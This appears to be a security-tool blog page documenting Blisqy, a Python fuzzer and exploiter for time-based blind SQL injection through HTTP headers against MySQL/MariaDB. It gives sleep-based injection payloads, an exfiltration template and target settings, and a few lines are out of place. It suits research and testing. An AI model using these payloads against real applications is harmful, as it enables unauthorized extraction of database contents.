Blisqy is a tool to aid Web Security researchers to find Time-based Blind SQL injection on HTTP Headers and also exploitation of the same vulnerability.
The exploitation enables slow data siphon from a database (currently supports MySQL/MariaDB only) using bitwise operation on printable ASCII characters, via a blind-SQL injection.
For interoperability with other Python tools and to enable other users utilise the features provided in Blisqy, the modules herein can be imported into other Python based scripts.
When testing for Time-based Blind SQL injections, any network lag or congestion can affect the effectiveness of your fuzzing or exploitation.
To compensate for the possible network lags and uncertainties that might cause delays, Blisqy time comparison is dynamic and it’s calculated at runtime for each test.
The tests utilizes greenlet
(alight-weight cooperatively-scheduled execution unit) to provide a high-level synchronous API on top of libevevent
loop.
It provides a fast and efficient way of carrying out the payload tests in a short time, also, one particular test should not affect another because they are not fully done in a sequential method.
It now supports fuzzing for Time-based Blind SQL Injection on HTTP Headers and the main functionalities (fuzzing and exploitation) separated to independent files for portability.
Also Read – Vulnx : An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS
Fuzzing with Blisqy
To use the Fuzzing functionality, import the following module in your Python script and provide a target along with the fuzzing data as shown below:
from lib.blindfuzzer import blindSeeker
Target parameters should be in a Dictionary/JSON format, for example (Note the variable data-types):
Server = ‘192.168.56.101’
Port = 80
Index = 1
Method = ‘GET’
Headerfile = “fuzz-data/headers/default_headers.txt”
Injectionfile = “fuzz-data/payloads/mysql_time.txt”
target_params = {
‘server’: Server,
‘port’: Port,
‘index’: Index,
‘headersFile’: Headerfile,
‘injectionFile’: Injectionfile,
‘method’: Method
}
Invoking the fuzzer once the target parameters are provided is as shown below :
vulns = blindSeeker(target_params)
vulns.fuzz()
You can checkout FindBlindSpot.py
for this example provided.
Sample Fuzzing Output
If you are successful, you should get a report of the ‘injectable’ tests carried out. Please note, as much as Blisqy tries to compensate for network lags and congestion while testing it’s is important to proof-test the reported positive tests before proceeding.
Below is a sample report:
=================== [ Key Terms] ===================
Index = Configured Constant (Delay)
Base Index Record = Server Ping Before Fuzzing
Benching Record = Base Index Record + Index
Fuzzing Record = Time taken to process request with Index
===================== [ Logic] =====================
If Fuzzing Record is greater than Benching Record,
treat as a positive; else, treat as a negative.
[+] Injection : X-Forwarded-For : ‘ or sleep(1)#
[+] Header : X-Forwarded-For
[] Index Record : 0.000160932540894 [] Benching Record : 1.00016093254
[*] Fuzzing Record : 9.01
[!] Test 436 is Injectable.
—————————————————————————————-
[+] Injection : X-Forwarded-For : ‘ or sleep(1)=’
[+] Header : X-Forwarded-For
[] Index Record : 0.000378847122192 [] Benching Record : 1.00037884712
[*] Fuzzing Record : 18.02
[!] Test 438 is Injectable.
—————————————————————————————
Exploitation with Blisqy
After finding a potential Time-based Blind SQL injection, you can prepare a script to Exploit the vulnerable Web application.
Just as the fuzzer, you can import the module for exploitation in your Python script and define a template for the exploitation operation. Below is an example of how to import the module in a Python script:
from lib.blindexploit import SqlEngine
Next, you will need to provide details of your target along with it’s target parameters for exploitation. Below is a sample implementation of exploiting the found blind sql injection found by the fuzzer:
The target data should be in a Dictionary/JSON format specifying the server, port, the found vulnerable header and it’s value (some applications will need or check for a certain value). Also Note the variable data-types.
target = {
‘server’: ‘192.168.56.101’,
‘port’: 80,
‘vulnHeader’: ‘X-Forwarded-For’,
‘headerValue’: ‘fuzzer’
}
Target parameters should follow allowing the user to specify some options related to the exploitation preferences.
targetParam = {
‘sleepTime’: 0.1,
‘payload’: ‘pass’,
‘mysqlDig’: ‘yes’,
‘interactive’: ‘on’,
‘verbosity’: ‘high’
}
select @@hostname
. The default option is 'pass'
.After providing your target and its parameters, the next thing to provide is a template for the exploitation routine. Blisqy provides a way users can specify where to inject the exfiltration SQL payload and the sleeptime
delay. Below is an example of an implementation for one of the found vulnerabilities on the sample report provided in the previous subsection.
Found injection on X-Forwarded-For header:
‘ or sleep(1)=’
Template for this particular injection:
sqli = “‘ or if((*sql*),sleep(*time*),0) and ‘1’=’1”
During runtime, the *sql*
will be replaced with an SQL injection payload and *time*
will be replaced with a delay for sleep().
Once all these are done, the last part is to instantiate the exploitation routine and let the MysqlDigger()
method do the working.
# Create an instance
BlindSql = SqlEngine(target, targetParam, sqli)
# Enumerate the MySql Database
BlindSql.MysqlDigger()
You can check ExploitBlindSpot.py
for this example provided.
Below is an example of an exploitation operation:
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…